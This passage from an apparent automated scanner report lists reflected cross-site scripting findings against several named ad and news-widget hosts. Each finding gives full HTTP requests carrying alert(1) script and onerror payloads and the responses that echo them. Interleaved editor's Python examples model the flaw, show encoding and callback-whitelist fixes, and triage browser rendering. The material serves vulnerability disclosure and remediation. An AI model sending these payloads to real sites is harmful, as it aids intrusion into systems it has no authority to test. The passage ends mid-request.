The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ae5"><script>alert(1)</script>bae12da53c4 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4;adiframe=y">
...[SNIP]...

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43184"><script>alert(1)</script>268ab098d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 326

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1;adiframe=y">
...[SNIP]...
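
Editor's worked example for findings 1.228 to 1.232 (added here; it is not part of the scanner output and not media2.legacy.com's code). It models the observed reflection of the request path into the double-quoted src attribute and puts a hardened version next to it. AD_BASE, TEMPLATE, render_vulnerable and render_hardened are assumptions about how the loader tag is built, inferred from the request/response pairs above; PAYLOAD and the two sample tails are constructed from the same pairs.

```python
import html
from urllib.parse import quote

# Inferred from the report: the server rewrites /adiframe/<tail> into a
# loader tag whose src is /addyn/<tail>;adiframe=y (assumption, not the
# real server code).
AD_BASE = "http://media2.legacy.com/addyn/"
TEMPLATE = ('<html><body><base target=_blank>'
            '<script language="JavaScript" type="text/javascript" src="{src}">')

# Marker payload of the shape the scanner used in findings 1.228-1.232.
PAYLOAD = '4d71e"><script>alert(1)</script>80dfd50a855'


def render_vulnerable(path_tail: str) -> str:
    """Models the observed behaviour: the request path tail is concatenated
    into a double-quoted src attribute with no encoding, so a '"' in the
    path closes the attribute and everything after it becomes markup."""
    return TEMPLATE.format(src=AD_BASE + path_tail + ";adiframe=y")


def render_hardened(path_tail: str) -> str:
    """Hypothetical fix: two layers of context-specific encoding.
    1. percent-encode the untrusted tail for the URL context, keeping only
       the delimiters the ad path legitimately uses (/ ; = . - _ ,);
    2. HTML-attribute-encode the finished URL before emitting it.
    Together they make the attribute boundary unreachable regardless of
    what the URL layer happens to let through."""
    safe_url = AD_BASE + quote(path_tail, safe="/;=.-_,") + ";adiframe=y"
    return TEMPLATE.format(src=html.escape(safe_url, quote=True))


def reflects_payload(body: str, payload: str = PAYLOAD) -> bool:
    """The scanner's own test reduced to its essence: does the exact marker
    come back byte-for-byte, i.e. unencoded?"""
    return payload in body


# Constructed sample inputs: a legitimate tail from the report and the same
# tail with the marker spliced into REST URL parameter 5.
BENIGN_TAIL = "3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1"
ATTACK_TAIL = "3.0/5306.1/1369114/0" + PAYLOAD + "/-1/size=728x90/adtech"

if __name__ == "__main__":
    print(render_vulnerable(ATTACK_TAIL))
    print(render_hardened(ATTACK_TAIL))
```

The benign tail renders identically in both versions, so the fix costs nothing for legitimate ad paths; the attack tail comes back as %22%3E%3Cscript%3E inside the attribute and the HTML parser never sees a tag.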

1.233. http://odb.outbrain.com/utils/get [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The value of the callback request parameter is copied unencoded into the response body, which is a JSONP wrapper rather than an HTML page. The payload a0654<script>alert(1)</script>49c55aa1899 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that arbitrary markup can be reflected into the response. Whether it executes as JavaScript depends on the browser: the body is served as Content-Type: text/x-json with no X-Content-Type-Options header, so a browser navigated directly to this URL will not necessarily parse it as HTML, and the Certain confidence above should be checked against the target browsers before it is reported as exploitable. The underlying defect is that the callback value is not restricted to a JavaScript identifier; the legitimate value already contains parentheses and a ${json} placeholder, so the endpoint accepts any characters at all.

Request

GET /utils/get?url=http%3A%2F%2Fuk.reuters.com%2Farticle%2FidUKTRE71C1YB20110213&callback=outbrain_rater.returnedOdbData(${json},0)a0654<script>alert(1)</script>49c55aa1899&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=34100&ref=&apv=false&rand=0.5271956750657409&sig=Ff9vsySQ HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=3c60260a-1d8b-4ff2-80ef-7d4e1a46ea5e; _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhtWmjNsOQ6c0="; _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBfGWrvBU5HcM="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1297647380027; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhlLidDM1W/uGQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBq0wY9bjkiCMEtu+eLYf3CQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 20-Feb-2011 14:24:20 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: recs-98b44cb774fd02fd18559597da304954="bPmNSD4EdkQfTcxXO3IbzODj1tUcqGdac9Y1u51O9pcWTxMsM4Sk+CRl0Q8Po4rSMcGqA6kc4x3UMdgdNIMGwS2VLb3EJlEUkzVk0Zh4eYV1v5FjLMguSOtw5rpmzPNIhDKxqp7mHEZ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 14-Feb-2011 01:41:20 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 9775

outbrain_rater.returnedOdbData({'response':{'exec_time':25,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'187236313','req_id':'0d5dd9641c563b2519e3826e3e34503f'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','defaultRecNumber':5}}},0)a0654<script>alert(1)</script>49c55aa1899

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied unencoded into the response body. The payload 4b9c2<script>alert(1)</script>e6884640a74 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that arbitrary markup can be reflected into the response. The response carries no Content-Type header at all (and no X-Content-Type-Options: nosniff), so how the body is interpreted is left to browser MIME sniffing: a browser that sniffs the <script> tag and treats the body as HTML will execute the payload, one that treats it as plain text or script will not. The server-side fix is to reject offerId values that are not in the expected identifier format and to send an explicit Content-Type on every response, including this error path.

Request

GET /offers/script.sc?offerId=864b9c2<script>alert(1)</script>e6884640a74 HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 88
Date: Mon, 14 Feb 2011 01:39:38 GMT

// Offer id 864b9c2<script>alert(1)</script>e6884640a74 does not exists or is not ACTIVE
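
Editor's added example (not from the scanner or from any of the hosts above) for triaging a reflected-marker hit like 1.228, 1.233 and 1.234 before it is reported with Confidence: Certain. The three sample responses are constructed, truncated copies of the ones shown in this report; split_response, reflection_context and triage are hypothetical helper names. The point it shows is that the same verbatim reflection lands in three different situations: a double-quoted attribute in a text/html body, a JSONP wrapper served as text/x-json, and a body with no Content-Type at all.

```python
# Constructed, truncated copies of the responses in findings 1.228, 1.233
# and 1.234 (sample input only, so the triage runs offline).
LEGACY = (
    "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n"
    '<html><body><base target=_blank><script language="JavaScript" '
    'type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/'
    '1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/adtech;adiframe=y">'
)
OUTBRAIN = (
    "HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n"
    "Content-Type: text/x-json;charset=UTF-8\r\n\r\n"
    "outbrain_rater.returnedOdbData({'response':{}},0)"
    "a0654<script>alert(1)</script>49c55aa1899"
)
CBS = (
    "HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nContent-Length: 88\r\n\r\n"
    "// Offer id 864b9c2<script>alert(1)</script>e6884640a74 does not exists or is not ACTIVE"
)


def split_response(raw: str):
    """Splits a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:          # [0] is the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def reflection_context(body: str, marker: str) -> str:
    """Where does the marker land in the markup? Walk back from the marker to
    the nearest '<'. If that tag is still open and an odd number of '"'
    precede the marker, the marker sits inside a double-quoted attribute."""
    idx = body.find(marker)
    if idx < 0:
        return "not reflected"
    tag_start = body.rfind("<", 0, idx)
    if tag_start < 0 or ">" in body[tag_start:idx]:
        return "text"
    return "attribute (double-quoted)" if body[tag_start:idx].count('"') % 2 else "tag"


def triage(raw: str, marker: str) -> dict:
    """Combines reflection, markup context and the response's MIME handling
    into a verdict a reviewer can act on."""
    headers, body = split_response(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    reflected = marker in body
    if not ctype:
        rendering = "no Content-Type: browser MIME-sniffs the body"
    elif ctype == "text/html":
        rendering = "text/html: parsed as HTML when navigated to directly"
    elif nosniff:
        rendering = f"{ctype} with nosniff: not parsed as HTML"
    else:
        rendering = f"{ctype} without nosniff: confirm handling per browser"
    if not reflected:
        verdict = "not reflected"
    elif ctype == "text/html":
        verdict = "confirmed: HTML context"
    else:
        verdict = "reflected; confirm browser rendering before rating Certain"
    return {"reflected": reflected, "context": reflection_context(body, marker),
            "rendering": rendering, "verdict": verdict}


if __name__ == "__main__":
    for name, raw, marker in (
        ("1.228", LEGACY, '4d71e"><script>alert(1)</script>80dfd50a855'),
        ("1.233", OUTBRAIN, "a0654<script>alert(1)</script>49c55aa1899"),
        ("1.234", CBS, "4b9c2<script>alert(1)</script>e6884640a74"),
    ):
        print(name, triage(raw, marker))
```

Only the legacy.com hit comes out as confirmed; the other two are real reflections whose exploitability hinges on how the victim's browser treats text/x-json or a missing Content-Type, which is exactly the caveat worth adding to a finding before it ships at Confidence: Certain.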

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the callback request parameter (the scanner reports the name as &callback because the query string starts with an empty ?& separator) is copied unencoded into the response body as the JSONP function name. The payload f4578<script>alert(1)</script>ead23a8fea2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The JSONP body is served with Content-Type: text/html;charset=UTF-8 and no X-Content-Type-Options header, so a browser that loads this URL directly parses it as HTML and executes the injected script tag. Restricting callback to a dotted JavaScript identifier and serving the body as application/javascript would remove both the injection and the HTML rendering.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:01 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1203

jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","date
...[SNIP]...

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the assocId request parameter is copied unencoded into a JSON string value inside the JSONP response. The payload b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1 was submitted in the assocId parameter. This input was echoed as b9198<img src=a onerror=alert(1)>2e70df75fb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The URL-decoded payload sits inside a double-quoted JSON string, which is harmless to a JSON parser; it is dangerous here only because the endpoint serves the body as text/html, so the browser's HTML parser sees the <img> tag and fires onerror. The same applies to findings 1.237 to 1.242 below, which reflect other parameters into the same JSON object. Escaping <, > and & inside JSON strings as \u003c, \u003e and \u0026, and serving the response as application/javascript, closes all of them.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20b9198<img src=a onerror=alert(1)>2e70df75fb1","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","key
...[SNIP]...
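
Editor's added example for 1.235 (the callback name) and for 1.236 to 1.242 (string values inside the JSON payload); it is not code from oscar.wapolabs.com or from this report. validate_callback, json_for_script, render_jsonp and decode_jsonp are hypothetical names, and the sample inputs are constructed from the requests above. The assumed remediation is an identifier whitelist for the callback plus \u-escaping of <, > and & inside JSON strings, so the body cannot form markup even if it is still served as text/html.

```python
import json
import re

# A JSONP callback is a JavaScript member expression: identifiers joined by
# dots and nothing else. Parentheses, quotes, '<' and whitespace are rejected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Constructed inputs mirroring the requests in findings 1.235 and 1.236.
GOOD_CB = "jsonp1297647421325"
BAD_CB = "jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2"
INJECTED_ASSOC = "wapo-20b9198<img src=a onerror=alert(1)>2e70df75fb1"


def validate_callback(name: str):
    """Returns the callback unchanged if it is a dotted identifier, else None."""
    return name if CALLBACK_RE.fullmatch(name) else None


def json_for_script(obj) -> str:
    """json.dumps with '<', '>' and '&' written as \\u escapes. The output is
    still valid JSON and valid JavaScript, but it can no longer form an
    <img> or </script> tag if the body is ever handed to an HTML parser."""
    return (json.dumps(obj)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_jsonp(callback: str, data: dict) -> str:
    """Builds the JSONP body, raising on a bad callback instead of echoing it.
    Serve the result as application/javascript with X-Content-Type-Options:
    nosniff; those headers are part of the assumed fix, not in the report."""
    cb = validate_callback(callback)
    if cb is None:
        raise ValueError("invalid JSONP callback name")
    return f"{cb}({json_for_script(data)})"


def decode_jsonp(body: str):
    """Strips the callback wrapper and parses the JSON, to show that the
    escaped output still round-trips to the original values."""
    inner = body[body.index("(") + 1 : body.rindex(")")]
    return json.loads(inner)


if __name__ == "__main__":
    print(render_jsonp(GOOD_CB, {"assocId": INJECTED_ASSOC, "keywords": "politics"}))
    try:
        render_jsonp(BAD_CB, {})
    except ValueError as exc:
        print("rejected:", exc)
```

The existing outbrain callback from 1.233 (outbrain_rater.returnedOdbData) passes the whitelist, while the version carrying (${json},0) does not, so the check is strict without breaking the dotted names legitimate clients send.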

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the commercialNode request parameter is copied into the HTML document as plain text between tags. The payload 65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8 was submitted in the commercialNode parameter. This input was echoed as 65d5f<img src=a onerror=alert(1)>139c3531da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1250

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics65d5f<img src=a onerror=alert(1)>139c3531da8","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":
...[SNIP]...

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033 was submitted in the container parameter. This input was echoed as ec713<img src=a onerror=alert(1)>307e13bd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 6944

jsonp1297647421325({"links":[{"link":{"class":"com.wapo.revenue.Link","id":"0b89a60a-34c2-11e0-b2f6-1231391009d2","additionalFields":null,"amountSaved":"$10.05","asin":"1616081694","author":"Andrew J.
...[SNIP]...
ght":144},"adLinkId":"0010c27c-3657-11e0-b2f6-1231391009d2"}],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2ec713<img src=a onerror=alert(1)>307e13bd033","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.was
...[SNIP]...

1.239. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the contentId request parameter is copied into the HTML document as plain text between tags. The payload 4c394<img%20src%3da%20onerror%3dalert(1)>bb26c5261f7 was submitted in the contentId parameter. This input was echoed as 4c394<img src=a onerror=alert(1)>bb26c5261f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page4c394<img%20src%3da%20onerror%3dalert(1)>bb26c5261f7&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
